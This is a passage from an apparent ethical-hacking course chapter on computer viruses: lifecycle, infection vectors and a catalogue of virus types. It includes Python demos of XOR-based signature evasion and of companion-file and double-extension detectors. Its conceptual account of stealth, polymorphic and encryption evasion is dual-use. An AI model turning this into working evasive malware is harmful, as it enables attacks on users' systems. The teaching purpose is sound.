
Introduction to Viruses

• A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector or document
• Viruses are generally transmitted through file downloads, infected disk/flash drives, and as email attachments
• Indications of a virus attack include constant antivirus alerts, suspicious hard drive activity, lack of storage space, unwanted pop-up windows, etc.

Characteristics of Viruses
• Infect other programs
• Transform themselves
• Encrypt themselves
• Alter data
• Corrupt files and programs
• Self-replicate

Purpose of Creating Viruses
• Inflict damage on competitors
• Financial benefits
• Vandalism
• Play pranks
• Research projects
• Cyber terrorism
• Distribute political messages
• Damage networks or computers
• Gain remote access to a victim's computer

Introduction to Viruses

Viruses are the scourge of modern computing. Computer viruses have the potential to wreak
havoc on both business and personal computers. The lifetime of a virus depends on its ability to
reproduce itself. Therefore, attackers design every virus code such that the virus replicates
itself n times.
A computer virus is a self-replicating program that produces its code by attaching copies of
itself to other executable code and operates without the knowledge or consent of the user. Like
a biological virus, a computer virus is contagious and can contaminate other files; however,
viruses can infect external machines only with the assistance of computer users.
Some viruses affect computers as soon as their code is executed; other viruses remain dormant
until a pre-determined logical circumstance is met. Viruses infect a variety of files, such as
overlay files (.OVL) and executable files (.EXE, .SYS, .COM, or .BAT). They are transmitted
through file downloads, infected disk/flash drives, and email attachments.
Characteristics of Viruses
The performance of a computer is affected by a virus infection. This infection can lead to data
loss, system crash, and file corruption.
Some of the characteristics of a virus are as follows:
• Infects other programs
• Transforms itself
• Encrypts itself
• Alters data
• Corrupts files and programs
• Replicates itself
Purpose of Creating Viruses
Attackers create viruses with disreputable motives. Criminals create viruses to destroy a
company's data, as an act of vandalism, or to destroy a company's products; however, in some
cases, viruses aid the system.
An attacker creates a virus for the following purposes:
• Inflict damage on competitors
• Realize financial benefits
• Vandalize intellectual property
• Play pranks
• Conduct research
• Engage in cyber-terrorism
• Distribute political messages
• Damage network or computers
• Gain remote access to the victim's computer
Indications of Virus Attack
Indications of virus attacks arise from abnormal activities. Such activities reflect the nature of a
virus by interrupting the regular flow of a process or a program. However, not all bugs created
contribute toward attacking the system; they may be merely false positives. For example, if the
system runs slower than usual, one may assume that a virus has infected the system; however,
the actual reason might be program overload.
An effective virus tends to multiply rapidly and may infect some machines in a short period.
Viruses can infect files on the system, and when such files are transferred, they can infect
machines of other users who receive them. A virus can also use file servers to infect files.
When a virus infects a computer, the victim or user will be able to identify some indications of
the presence of virus infection.
Some indications of computer virus infection are as follows:
• Processes require more resources and time, resulting in degraded performance
• Computer beeps with no display
• Drive label changes and OS does not load
• Constant antivirus alerts
• Computer freezes frequently or encounters an error such as BSOD
• Files and folders are missing
• Suspicious hard drive activity
• Browser window "freezes"
• Lack of storage space
• Unwanted advertisements and pop-up windows
Stages of Virus Lifecycle

• Design: Developing virus code using programming languages or construction kits
• Replication: Virus replicates itself for a period within the target system and then spreads itself
• Launch: It gets activated when the user performs certain actions such as running infected programs
• Detection: A virus is identified as a threat infecting target systems
• Incorporation: Antivirus software developers assimilate defenses against the virus
• Execution of the damage routine: Users install antivirus updates and eliminate the virus threats
Stages of Virus Lifecycle

The virus lifecycle includes the following six stages from origin to elimination.
1. Design: Development of virus code using programming languages or construction kits.

2. Replication: The virus replicates for a period within the target system and then spreads
itself.

3. Launch: The virus is activated when the user performs specific actions such as running
an infected program.
4. Detection: The virus is identified as a threat infecting target system.
5. Incorporation: Antivirus software developers assimilate defenses against the virus.
6. Execution of the damage routine: Users install antivirus updates and eliminate the virus
threats.
Working of Viruses

Infection Phase
• In the infection phase, the virus replicates itself and attaches to a .exe file in the system
• [Figure: .EXE file before and after infection. Clean file: file header, start of program, end of program. Virus-infected file: file header, start of program, virus jump to the virus code, end of program]

Attack Phase
• Viruses are programmed with trigger events to activate and corrupt systems
• Some viruses infect each time they are run, and others infect only when a certain predefined condition is met, such as a user's specific task, a day, time, or a specific event
• [Figure: unfragmented file before attack (File A: pages 1, 2, 3; File B: pages 1, 2, 3) versus file fragmented due to virus attack (pages of File A and File B interleaved out of order)]
Working of Viruses
Viruses can attack a target host's system using a variety of methods. They can attach
themselves to programs and transmit themselves to other programs through specific events.
Viruses need such events to take place, as they cannot self-start, infect hardware, or transmit
themselves using non-executable files. "Trigger" and "direct attack" events can cause a virus to
activate and infect the target system when the user triggers attachments received through
email, websites, malicious advertisements, flashcards, pop-ups, and so on. The virus can then
attack the system's built-in programs, antivirus software, data files, system startup settings, etc.
Viruses have two phases: the infection phase and the attack phase.
• Infection Phase
Programs modified by a virus infection can enable virus functionalities to run on the
system. The virus infects the target system after it is triggered and becomes active upon
the execution of infected programs, because the program code leads to the virus code.
The two most important factors in the infection phase of a virus are as follows:
o Method of infection
o Method of spreading
A virus infects a system in the following sequence:
o The virus loads itself into memory and checks for an executable on the disk.
o The virus appends malicious code to a legitimate program without the permission or
knowledge of the user.
o The user is unaware of the replacement and launches the infected program.
o The execution of the infected program also infects other programs in the system.
o The above cycle continues until the user realizes that there is an anomaly in the
system.
Apparently, the user unknowingly triggers and executes the virus for it to function.
There are many ways to execute programs while the computer is running. For example,
if the user installs any software tool, the setup program calls various built-in
subprograms during extraction. If a virus program already exists, it can be activated with
this type of execution, and the virus can also infect additional setup programs.
Specific viruses infect in different ways, such as
o A file virus infects by attaching itself to an executable system application program.
Potential targets for virus infections are as follows:
• Source code
• Batch files
• Script files
o Boot sector viruses execute their code before the target PC is booted.
Viruses spread in a variety of ways. There are virus programs that infect and keep
spreading every time the user executes them. Some virus programs do not infect
programs when first executed. They reside in a computer's memory and infect programs
later. Such virus programs wait for a specified trigger event to spread at a later stage.
Therefore, it is difficult to recognize which event might trigger the execution of a
dormant virus. As illustrated in the figure below, the .EXE file's header, when triggered,
executes and starts running the application. Once this file is infected, any trigger event
from the file's header can activate the virus code along with the application program
immediately after executing it.
The most popular methods by which a virus spreads are as follows:
o Infected files: A virus can infect a variety of files.
o File-sharing services: A virus can take advantage of file servers to infect files. When
unsuspecting users open the infected files, their machines also become infected.
o DVDs and other storage media: When infected storage media such as DVDs, flash
drives, and portable hard disks are inserted into a clean system, the system gets
infected.
o Malicious attachments and downloads: A virus spreads if a malicious attachment
sent via email is opened or when apps are downloaded from untrusted sources.
[Figure: .EXE file before and after infection. Clean file: file header, start of program, end of program. Virus-infected file: file header, start of program, virus jump to the virus code, end of program]

Figure 7.34: Infection Phase

• Attack Phase

Once viruses spread throughout the target system, they start corrupting the files and
programs of the host system. Some viruses can trigger and corrupt the host system only
after the triggering event is activated. Some viruses have bugs that replicate themselves
and perform activities such as deleting files and increasing session time. Viruses corrupt
their targets only after spreading as intended by their developers.
Most viruses that attack target systems perform the following actions:
o Delete files and alter the content of data files, slowing down the system
o Perform tasks not related to applications, such as playing music and creating
animations
[Figure: unfragmented file before attack (File A: pages 1, 2, 3; File B: pages 1, 2, 3) versus file fragmented due to virus attack (pages of File A and File B interleaved out of order)]

Figure 7.35: Attack Phase

The figure shows two files, A and B. Before the attack, the two files are located one after
the other in an orderly manner. Once a virus code infects the file, it alters the position of
the files placed consecutively, leading to inaccuracy in file allocations and causing the
system to slow down as the user tries to retrieve the files.
In the attack phase:
o Viruses execute upon triggering specific events
o Some viruses execute and corrupt via built-in bug programs after being stored in the
host's memory
o The latest and most advanced viruses conceal their presence, attacking only after
thoroughly spreading through the host
How does a Computer Get Infected by Viruses?

• When a user accepts files and downloads without properly checking the source
• Opening infected e-mail attachments
• Clicking malicious online ads
• Installing pirated software
• Not updating and not installing new versions of plug-ins
• Not running the latest antivirus application
• Using portable media
• Connecting to untrusted networks
How does a Computer Get Infected by Viruses?

To infect a system, first, a virus has to enter it. Once the user downloads and installs the virus
from any source and in any form, it replicates itself to other programs. Then, the virus can
infect the computer in various ways, some of which are listed below:
• Downloads: Attackers incorporate viruses in popular software programs and upload
them to websites intended for download. When a user unknowingly downloads this
infected software and installs it, the system is infected.
• Email attachments: Attackers usually send virus-infected files as email attachments to
spread the virus on the victim's system. When the victim opens the malicious
attachment, the virus automatically infects the system.
• Pirated software: Installing cracked versions of software (OS, Adobe, Microsoft Office,
etc.) might infect the system as they may contain viruses.
• Failing to install security software: With the increase in security parameters, attackers
are designing new viruses. Failing to install the latest antivirus software or regularly
update it may expose the computer system to virus attacks.
• Updating software: If patches are not regularly installed when released by vendors,
viruses might exploit vulnerabilities, thereby allowing an attacker to access the system.
• Browser: By default, every browser comes with built-in security. An incorrectly
configured browser could result in the automatic running of scripts, which may, in turn,
allow viruses to enter the system.
• Firewall: Disabling the firewall will compromise the security of network traffic and invite
viruses to infect the system.
• Pop-ups: When the user clicks any suspicious pop-up by mistake, the virus hidden
behind the pop-up enters the system. Whenever the user turns on the system, the
installed virus code will run in the background.
• Removable media: When a healthy system is connected to virus-infected removable
media (e.g., CD/DVD, USB drive, card reader), the virus spreads to the system.
• Network access: Connecting to an untrusted Wi-Fi network, leaving Bluetooth ON, or
permitting a file sharing program that is accessed openly will allow a virus to take over
the device.
• Backup and restore: Taking a backup of an infected file and restoring it to a system
infects the system again with the same virus.
• Malicious online ads: Attackers post malicious online ads by embedding malicious code
in the ads, also known as malvertising. Once users click these ads, their computers get
infected.
• Social Media: People tend to click on social media sites, including malicious links shared
by their contacts, which can infect their systems.
Types of Viruses

• Viruses are categorized according to their functioning and targets
• Some of the examples include:
  • System or Boot Sector Virus
  • File and Multipartite Virus
  • Macro and Cluster Virus
  • Stealth/Tunneling Virus
  • Encryption Virus
  • Sparse Infector Virus
  • Polymorphic Virus
  • Metamorphic Virus
  • Overwriting File or Cavity Virus
  • Companion/Camouflage Virus
  • Shell and File Extension Virus
  • FAT and Logic Bomb Virus
  • Web Scripting Virus
  • Email and Armored Virus
  • Add-on and Intrusive Virus
  • Direct Action or Transient Virus
  • Terminate & Stay Resident Virus
Types of Viruses
Computer viruses are malicious software programs written by attackers to gain unauthorized
access to a target system. Thus, they compromise the security of the system as well as its
performance. For any virus to corrupt a system, it has to first associate its code with executable
code.

It is important to understand how viruses:


• Add themselves to the target host's code
• Choose to act upon the target system
Viruses are categorized according to their functioning and targets. Some of the most common
types of computer viruses that adversely affect the security of systems are listed below:
1. System or Boot Sector Virus
2. File Virus
3. Multipartite Virus
4. Macro Virus
5. Cluster Virus
6. Stealth/Tunneling Virus
7. Encryption Virus
8. Sparse Infector Virus
9. Polymorphic Virus
10. Metamorphic Virus
11. Overwriting File or Cavity Virus
12. Companion Virus/Camouflage Virus
13. Shell Virus
14. File Extension Virus
15. FAT Virus
16. Logic Bomb Virus
17. Web Scripting Virus
18. Email Virus
19. Armored Virus
20. Add-on Virus
21. Intrusive Virus
22. Direct Action or Transient Virus
23. Terminate and Stay Resident Virus (TSR)
System or Boot Sector Viruses

The most common targets for a virus are the system sectors, which include the master boot
record (MBR) and the DOS boot record system sectors. An OS executes code in these areas
while booting. Every disk has some sort of system sector. MBRs are the most virus-prone zones
because if the MBR is corrupted, all data will be lost. The DOS boot sector also executes during
system booting. This is a crucial point of attack for viruses.
The system sector consists of only 512 bytes of disk space. Therefore, system sector viruses
conceal their code in some other disk space. The primary carriers of system or boot sector
viruses are email attachments and removable media (USB drives). Such viruses reside in
memory. Some sector viruses also spread through infected files; these are known as
multipartite viruses.
A boot sector virus moves MBR to another location on the hard disk and copies itself to the
original location of MBR. When the system boots, first, the virus code executes and then
control passes to the original MBR.
[Figure: before infection, the disk starts with the MBR; after infection, the virus code occupies the original MBR location and is followed by the relocated MBR]

Figure 7.36: Working of system and boot sector virus

• Virus Removal
System sector viruses create the illusion that there is no virus on the system. One way to
deal with this virus is to avoid the use of the Windows OS and switch to Linux or Mac,
because Windows is more prone to such attacks. Linux and Macintosh have built-in
safeguards for protection against these viruses. The other approach is to periodically
perform antivirus checks.
File Viruses
File viruses infect files executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ,
PRG, MNU, and BAT files. File viruses can be direct-action (non-resident) or memory-resident
viruses.
File viruses insert their code into the original file and infect executable files. Such viruses are
numerous, albeit rare. They infect in a variety of ways and are found in numerous file types.
The most common type of file virus operates by identifying the file type it can infect most
easily, such as that with filenames ending in .COM or .EXE. During program execution, the virus
executes along with program files to infect more files. Overwriting a virus is not easy, as the
overwritten programs no longer function properly. These viruses tend to be found immediately.
Before inserting their code into a program, some file viruses save the original instructions and
allow the original program to execute, so that everything appears normal.
File viruses hide their presence using stealth techniques to reside in a computer's memory in
the same way as system sector viruses. They do not show any increase in file length while
performing directory listing. If a user attempts to read the file, the virus intercepts the request,
and the user gets back his original file. File viruses can infect many file types, as a wide variety
of infection techniques exist.

[Figure: attacker sends a file virus to the target; only the label "Attacker" is recoverable]
Figure 7.37: Working of file virus
Multipartite Viruses
A multipartite virus (also known as a multipart virus or hybrid virus) combines the approach of
file infectors and boot record infectors and attempts to simultaneously attack both the boot
sector and the executable or program files. When the virus infects the boot sector, it will, in
turn, affect the system files and vice versa. This type of virus re-infects a system repeatedly if it
is not rooted out entirely from the target machine. Some examples of multipartite viruses
include Invader, Flip, and Tequila.
Macro Viruses
Macro viruses infect Microsoft Word or similar applications by automatically performing a
sequence of actions after triggering an application. Most macro viruses are written using the
macro language Visual Basic for Applications (VBA), and they infect templates or convert
infected documents into template files while maintaining their appearance of common
document files.
Macro viruses are somewhat less harmful than other viruses. They usually spread via email.
Pure data files do not allow the spreading of viruses, but sometimes, the average user, due to
the extensive macro languages used in some programs, easily overlooks the line between a
data file and an executable file. In most cases, just to make things easy for users, the line
between a data file and a program starts to blur only when the default macros are set to run
automatically every time the data file is loaded. Virus writers can exploit universal programs
with macro capability, such as Microsoft Word, Excel, and other Office programs. Windows
Help files can also contain macro code.

[Figure: attacker sends a macro-enabled document to the user; the virus infects macro-enabled documents]
Figure 7.38: Working of a macro virus

Cluster Viruses
Cluster viruses infect files without changing the file or planting additional files. They save the
virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk
read point to the virus code instead of the actual program. Even though the changes in the
directory entry may affect all the programs, only one copy of the virus exists on the disk.
A cluster virus, e.g., Dir-2, first launches itself when any program starts on the computer
system, and control is then passed to the actual program.
This virus infection leads to severe problems if the victim does not know its exact location. If it
infects memory, it controls access to the directory structure on the disk.
If the victim boots from a clean floppy disk and then runs a utility such as CHKDSK, the utility
reports a serious problem with the cross-linked file on the disk. Such utilities usually offer to
correct the problem. If the offer is accepted, the virus infects all the executable files and results
in the loss of original content, or all files might appear to be of the same size.
Stealth Viruses/Tunneling Viruses
These viruses try to hide from antivirus programs by actively altering and corrupting the service
call interrupts while running. The virus code replaces the requests to perform operations with
respect to these service call interrupts. These viruses state false information to hide their
presence from antivirus programs. For example, a stealth virus hides the operations that it
modified and gives false representations. Thus, it takes over portions of the target system and
hides its virus code.
A stealth virus hides from antivirus software by hiding the original size of the file or temporarily
placing a copy of itself in some other system drive, thus replacing the infected file with the
uninfected file that is stored on the hard drive.
In addition, a stealth virus hides the modifications performed by it. It takes control of the
system's functions that read files or system sectors. When another program requests
information that has already modified by the virus, the stealth virus reports that information to
the requesting program instead. This virus also resides in memory.
To avoid detection, these viruses always take over system functions and use them to hide their
presence.
One of the carriers of stealth viruses is the rootkit. Installing a rootkit results in such a virus
attack because a Trojan installs the rootkit and is thus capable of hiding any malware.

[Figure: antivirus software asks the system "Give me the system file tcpip.sys to scan"; the virus hides the infected TCPIP.SYS and replies "Here you go" with the original TCPIP.SYS]

Figure 7.39: Working of stealth virus/tunneling virus

• Virus Removal
o Always perform a cold boot (boot from write-protected CD or DVD)
o Never use DOS commands such as FDISK to fix the virus
o Use antivirus software
Encryption Viruses
Encryption viruses or cryptolocker viruses penetrate the target system via freeware, shareware,
codecs, fake advertisements, torrents, email spam, and so on. This type of virus consists of an
encrypted copy of the virus and a decryption module. The decryption module remains constant,
whereas the encryption makes use of different keys.
An encryption virus consists of a decryption module and an encrypted copy of the code, which is
enciphered with a key. When the attacker injects the virus into the target machine, the decryptor
will first execute and decrypt the virus body. Then, the virus body executes and replicates or
becomes resident in the target machine. The replication process is successfully accomplished
using the encryptor. Each virus-infected file uses a different key for encryption. These viruses
employ XOR on each byte with a randomized key. The decryption technique employed is also
XOR: each byte is XORed with the randomized key, which is generated and saved by the root virus.
Encryption viruses block access to target machines or provide victims with limited access to the
system. They use encryption to hide from virus scanners. The virus scanner cannot detect the
encryption virus using signatures, but it can detect the decrypting module.
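To make concrete why a signature scanner can match the constant decryption module but not the encrypted body, here is an added Python illustration (not code from the page or from EC-Council): `DECRYPTOR_STUB` and `VIRUS_BODY` are constructed placeholder byte strings, and the copy layout (stub, key length, key, XORed body) is an assumption.

```python
"""Same body, different per-copy XOR key: a fixed byte pattern taken from the
body never matches an encrypted copy, while one taken from the constant
decryptor matches every copy. All byte strings below are constructed samples."""

DECRYPTOR_STUB = b"<constant decryptor module>"   # constructed; identical in every copy
VIRUS_BODY = b"<constructed virus body: placeholder text, not real code>"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the repeating key; applying it twice restores the data."""
    if not key:
        raise ValueError("key must be non-empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_infected_copy(body: bytes, key: bytes) -> bytes:
    """Assumed layout per copy: stub | key length | key | XOR(body, key).

    Only the last part differs between copies because each uses its own key,
    which the page says is generated and saved by the root virus.
    """
    if not 1 <= len(key) <= 255:
        raise ValueError("key length must fit in one byte")
    return DECRYPTOR_STUB + bytes([len(key)]) + key + xor_bytes(body, key)


def recover_body(copy: bytes) -> bytes:
    """What the decryptor does at run time: read the saved key and XOR the body back."""
    if not copy.startswith(DECRYPTOR_STUB):
        raise ValueError("not a copy produced by build_infected_copy")
    pos = len(DECRYPTOR_STUB)
    klen = copy[pos]
    key = copy[pos + 1:pos + 1 + klen]
    return xor_bytes(copy[pos + 1 + klen:], key)


def signature_hits(blob: bytes, signature: bytes) -> bool:
    """Plain pattern scanner: does a fixed byte sequence occur anywhere in the blob?"""
    return signature in blob


def scan_report(copies, body_sig: bytes, stub_sig: bytes) -> list:
    """For each copy: (body signature found?, decryptor signature found?)."""
    return [(signature_hits(c, body_sig), signature_hits(c, stub_sig)) for c in copies]


if __name__ == "__main__":
    keys = [b"\x5a", b"\x13\x37", b"\xa5\x3c\xc3"]          # constructed per-copy keys
    copies = [build_infected_copy(VIRUS_BODY, k) for k in keys]
    # body signature misses every copy, decryptor signature hits every copy
    print(scan_report(copies, VIRUS_BODY[:16], DECRYPTOR_STUB[:16]))
    # yet each copy decrypts back to the same body
    print(all(recover_body(c) == VIRUS_BODY for c in copies))
```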

[Figure: one virus code encrypted under three different keys (encryption key 1, 2, 3) yields three differently encrypted copies (Virus 1, Virus 2, Virus 3)]

Figure 7.40: Working of encryption virus

Sparse Infector Viruses

To spread infection, viruses typically attempt to hide from antivirus programs. Sparse infector
viruses infect less often and try to minimize their probability of discovery. These viruses infect
only occasionally upon satisfying certain conditions or infect only those files whose lengths fall
within a narrow range.
The sparse infector virus works with two approaches:
• Replicates only occasionally (e.g., every tenth program executed or on a particular day
of the week)
• Determines which file to infect based on certain conditions (e.g., infects target files with
a maximum size of 128 kb)
The diagram below shows the working of a sparse infector virus.
The attacker sends a sparse infector virus to the target machine and sets a wakeup call for the
virus to execute on the 15th day of every month. This strategy makes it difficult for the antivirus
program to detect the virus, thus allowing the virus to infect the target machine successfully.

[Figure: attacker sends the virus to the target machine with the instruction "Wake up on 15th of every month and execute code"]

Figure 7.41: Working of sparse infector virus
Polymorphic Viruses
Such viruses infect a file with an encrypted copy of a polymorphic code already decoded by a
decryption module. Polymorphic viruses modify their code for each replication to avoid
detection. They accomplish this by changing the encryption module and the instruction
sequence. Polymorphic mechanisms use random number generators in their implementation.
The general use of the mutation engine is to enable polymorphic code. The mutator provides a
sequence of instructions that a virus scanner can use to optimize an appropriate detection
algorithm. Slow polymorphic code prevents antivirus professionals from accessing the code. A
simple integrity checker detects the presence of a polymorphic virus in the system's disk.
A polymorphic virus consists of three components: the encrypted virus code, the decryptor
routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus
code. It decrypts the code only after taking control of the computer. The mutation engine
generates randomized decryption routines. Such decryption routines vary whenever the virus
infects a new program.
The polymorphic virus encrypts both the mutation engine and the virus code. When the user
executes a polymorphic-virus-infected program, the decryptor routine takes complete control
of the system, after which it decrypts the virus code and the mutation engine. Next, the
decryption routine transfers system control to the virus, which locates a new program to
infect. In the Random Access Memory (RAM), the virus makes a replica of itself as well as the
mutation engine. Then, the virus instructs the encrypted mutation engine to generate a new
randomized decryption routine, which can decrypt the virus. Here, the virus encrypts the new
copies of both the virus code and the mutation engine. Thus, this virus, along with the newly
encrypted virus code and encrypted mutation engine (EME), appends the new decryption
routine to a new program, thereby continuing the process.
Polymorphic viruses running on target systems are difficult to detect due to the encryption of
the virus body and the changes in the decryption routine each time these viruses infect. It is
difficult for virus scanners to identify these viruses, as no two infections look alike.

[Figure: the user runs an infected program; in RAM the decryptor routine decrypts the virus code and the mutation engine; the virus does the damage, instructs the mutation engine to create a new decryptor routine (DR) and a new encrypted mutation engine (EME), and produces a new polymorphic virus encrypted with a new key]

Figure 7.42: Working of polymorphic virus


Metamorphic Viruses
Metamorphic viruses are programmed such that they rewrite themselves completely each time
they infect a new executable file. Such viruses are sophisticated and use metamorphic engines
for their execution. Metamorphic code reprograms itself. It is translated into temporary code (a
new variant of the same virus but with different code) and then converted back into the original
code. This technique, in which the original algorithm remains intact, is used to avoid pattern
recognition by antivirus software. Metamorphic viruses are more effective than polymorphic
viruses.
The transformation of virus bodies ranges from simple to complex, depending on the technique
used. Some techniques used for metamorphosing viruses are as follows:
• Disassembler
• Expander
• Permutator
• Assembler
Virus bodies are transformed in the following steps:
1. Inserts dead code
2. Reshapes expressions
3. Reorders instructions
4. Modifies variable names
5. Encrypts program code
6. Modifies program control structure

[Figure: a metamorphic engine produces variant 1, variant 2 and variant 3 of the same malware with reordered code]

Figure 7.43: Working of metamorphic virus

Commonly known metamorphic viruses are as follows:


• Win32/Simile
The intruder programs this virus in assembly language to target Microsoft Windows.
This process is complicated and generates almost 90% of the virus code.
• Zmist
Zmist, also known as Zombie.Mistfall, was the first virus to use the technique called
"code integration." This code inserts itself into other code, regenerates the code, and
rebuilds the executable.
Overwriting File or Cavity Viruses
Some programs have empty spaces in them. Cavity viruses, also known as space fillers,
overwrite a part of the host file with a constant (usually nulls), without increasing the length of
the file while preserving its functionality. Maintaining a constant file size when infecting allows
the virus to avoid detection. Cavity viruses are rarely found due to the unavailability of hosts
and code complexity.
A new design of a Windows file, called the Portable Executable (PE), improves the loading
speed of programs. However, it leaves a particular gap in the file while it is being executed,
which can be used by the cavity virus to insert itself. The most popular virus family in this
category is the CIH virus (known as Chernobyl or Spacefiller).

Figure 7.44: Working of overwriting file or cavity virus (content in the file before infection: readable text; content in the file after infection: the same region filled with nulls; original file size 45 KB, infected file size 45 KB)

Companion/Camouflage Viruses
The companion virus stores itself with the same filename as the target program file. The virus
infects the computer upon executing the file, and it modifies the hard disk data. Companion
viruses use DOS to run COM files before the execution of EXE files. The virus installs an identical
COM file and infects EXE files.
This is what happens. Suppose that a companion virus is executing on the PC and decides that it
is time to infect a file. It looks around and happens to find a file called notepad.exe. It now
creates a file called notepad.com, containing the virus. The virus usually plants this file in the
same directory as the .exe file; however, it can also place it in any directory on the DOS path. If
you type notepad and press Enter, DOS executes notepad.com instead of notepad.exe (in
sequence, DOS will execute COM, then EXE, and then BAT files with the same root name, if they
are all in the same directory). The virus executes, possibly infecting more files, and then loads
and executes notepad.exe. The user would probably fail to notice that something is wrong. It is
easy to detect a companion virus just by the presence of the extra COM file in the system.
Figure 7.45: Working of companion virus/camouflage virus (the attacker's virus infects the system with a file notepad.com and saves it in the c:\winnt\system32 directory next to Notepad.exe)
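The detection hint in the text above (an extra COM file next to an EXE with the same root name) can be checked mechanically. The following Python is an added example, not from the original text; it encodes the DOS resolution order stated above (COM, then EXE, then BAT) and reports which file would actually run for a bare name. The directory listing in SAMPLE is constructed.

```python
"""Companion-virus check: flag root names that exist with more than one of the
COM/EXE/BAT extensions, because the DOS command interpreter resolves a bare
name as COM first, then EXE, then BAT, so the planted file runs first."""
import os
from dataclasses import dataclass

# Resolution order of the DOS command interpreter, as described in the text.
DOS_SEARCH_ORDER = (".com", ".exe", ".bat")


@dataclass(frozen=True)
class CompanionFinding:
    root: str          # the name the user would type, e.g. "notepad"
    runs_first: str    # the file DOS actually executes for that name
    shadowed: tuple    # same-root files that are never reached directly


def find_companions(filenames):
    """Pure function over a list of names so it is easy to test.

    Groups files by lower-cased root name and keeps only the executable
    extensions; any root with two or more variants is reported together with
    the file that wins the lookup. A legitimate program that ships both a
    .COM stub and an .EXE will show up too, so treat this as a lead, not proof."""
    by_root = {}
    for name in filenames:
        root, ext = os.path.splitext(name)
        ext = ext.lower()
        if ext in DOS_SEARCH_ORDER:
            by_root.setdefault(root.lower(), {})[ext] = name
    findings = []
    for root, variants in sorted(by_root.items()):
        if len(variants) < 2:
            continue
        ordered = [variants[e] for e in DOS_SEARCH_ORDER if e in variants]
        findings.append(CompanionFinding(root, ordered[0], tuple(ordered[1:])))
    return findings


def scan_directory(path):
    """Apply the check to one real directory (no recursion, matching a single
    directory on the DOS path)."""
    names = [e.name for e in os.scandir(path) if e.is_file()]
    return find_companions(names)


# Constructed listing mirroring the notepad example: notepad.com has been
# planted beside notepad.exe; BACKUP.BAT/backup.exe is the EXE-before-BAT case.
SAMPLE = ["notepad.exe", "notepad.com", "readme.txt", "calc.exe",
          "BACKUP.BAT", "backup.exe"]

if __name__ == "__main__":
    for f in find_companions(SAMPLE):
        print(f"{f.root}: '{f.runs_first}' runs first, shadowing {f.shadowed}")
```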

Shell Viruses
The shell virus code forms a shell around the target host program's code, making itself the
original program with the host code as its sub-routine. Nearly all boot program viruses are shell
viruses.

Figure 7.46: Working of shell virus (before infection: Original Program; after infection: Virus Code wrapped around the Original Program, which now runs as its sub-routine)

File Extension Viruses


File extension viruses change the extensions of files. The extension .TXT is safe as it indicates a
pure text file. With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you
will only see BAD.TXT. If you have forgotten that extensions are turned off, you might think that
this is a text file and open it. It actually is an executable Visual Basic Script virus file and could
cause severe damage.
The guidelines to secure files against such virus infection are as follows:
• Turn off "Hide file extensions" in Windows (Go to Control Panel ➔ Appearance and
Personalization ➔ Show hidden files and folders ➔ View tab ➔ Uncheck Hide
extensions for known file types).
• Scan all the files in the system using robust antivirus software; this requires a substantial
amount of time.
Figure 7.47: Screenshot displaying Folder Options Window (File Explorer Options, View tab, Advanced settings: "Hidden files and folders" with "Don't show hidden files, folders, or drives" / "Show hidden files, folders, and drives", and the "Hide extensions for known file types" checkbox)
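To make the BAD.TXT.VBS case above concrete, here is an added Python example (not part of the original text) that reproduces what Explorer displays when extensions are hidden and flags names whose real, final extension is executable while the visible one looks like a document. The extension sets and the SAMPLE listing are constructed for the example.

```python
"""Double-extension check for the BAD.TXT.VBS trick: Explorer hides only the
final extension, so a script can masquerade as a text file."""
import os

# Extensions Windows runs as programs or scripts (constructed, not exhaustive).
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".vbs", ".vbe", ".js",
                   ".jse", ".scr", ".pif", ".ps1", ".hta"}
# Extensions a user reads as a harmless document or media file.
DECOY_EXTS = {".txt", ".doc", ".docx", ".pdf", ".jpg", ".jpeg", ".png",
              ".xls", ".xlsx", ".mp3", ".mp4"}


def displayed_name(filename):
    """What Explorer shows with 'Hide extensions for known file types' on:
    the final extension is stripped, the inner one stays visible."""
    root, _ = os.path.splitext(filename)
    return root


def classify(filename):
    """Return ("executable-with-decoy", inner_ext) for BAD.TXT.VBS-style names,
    ("executable", None) for plain executables, or ("ok", None)."""
    root, ext = os.path.splitext(filename)
    if ext.lower() not in EXECUTABLE_EXTS:
        return ("ok", None)
    _, inner = os.path.splitext(root)
    if inner.lower() in DECOY_EXTS:
        return ("executable-with-decoy", inner)
    return ("executable", None)


def suspicious(filenames):
    """Names that look like a document when the real extension is hidden."""
    return [n for n in filenames if classify(n)[0] == "executable-with-decoy"]


# Constructed attachment listing: three deceptive names among ordinary ones.
SAMPLE = ["BAD.TXT.VBS", "report.pdf", "setup.exe", "invoice.pdf.exe",
          "notes.txt", "photo.jpg.scr"]

if __name__ == "__main__":
    for name in suspicious(SAMPLE):
        print(f"{name!r} is shown as {displayed_name(name)!r} but is {classify(name)}")
```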

FAT Viruses
A FAT virus is a computer virus that attacks the File Allocation Table (FAT), a system used in
Microsoft products and some other types of computer systems to access the information
stored on a computer. By attacking the FAT, a virus can cause severe damage to a computer.
FAT viruses can work in a variety of ways. Some are designed to embed themselves into files so
that when the FAT accesses the file, the virus is triggered. Others may attack the FAT directly.
Many are designed to overwrite files or directories, and material on a computer can be lost
permanently. If a FAT virus is sufficiently powerful, it can render a computer unusable in
addition to destroying data, forcing a user to reformat the computer.
Essentially, a FAT virus destroys the index, thereby making it impossible for a computer to
locate files. The virus can spread to files when the FAT attempts to access them, corrupting the
entire computer eventually. FAT viruses often manifest in the form of corrupted files, with
users noting that files are missing or inaccessible. The FAT architecture itself can also be
changed; e.g., a computer that should be using the FAT32 protocol might abruptly say that it is
using FAT12.
Logic Bomb Viruses
A logic bomb is a virus that is triggered in response to an event, such as the launching of an
application or the arrival of a specific date/time; the trigger condition is implemented as logic
inside the code.
For example, cyber-criminals use spyware to covertly install a keylogger on your computer. The
keylogger can capture keystrokes, such as usernames and passwords. The logic bomb is
designed to wait until you visit a website that requires you to log in with your credentials, such
as a banking site or social network. Consequently, the logic bomb will be triggered to execute
the keylogger, capture your credentials, and send them to a remote attacker.
When a logic bomb is programmed to execute on a specific date, it is referred to as a time
bomb. Time bombs are usually programmed to set off when important dates are reached, such
as Christmas and Valentine's Day.
Web Scripting Viruses
A web scripting virus is a type of computer security vulnerability that breaches your web
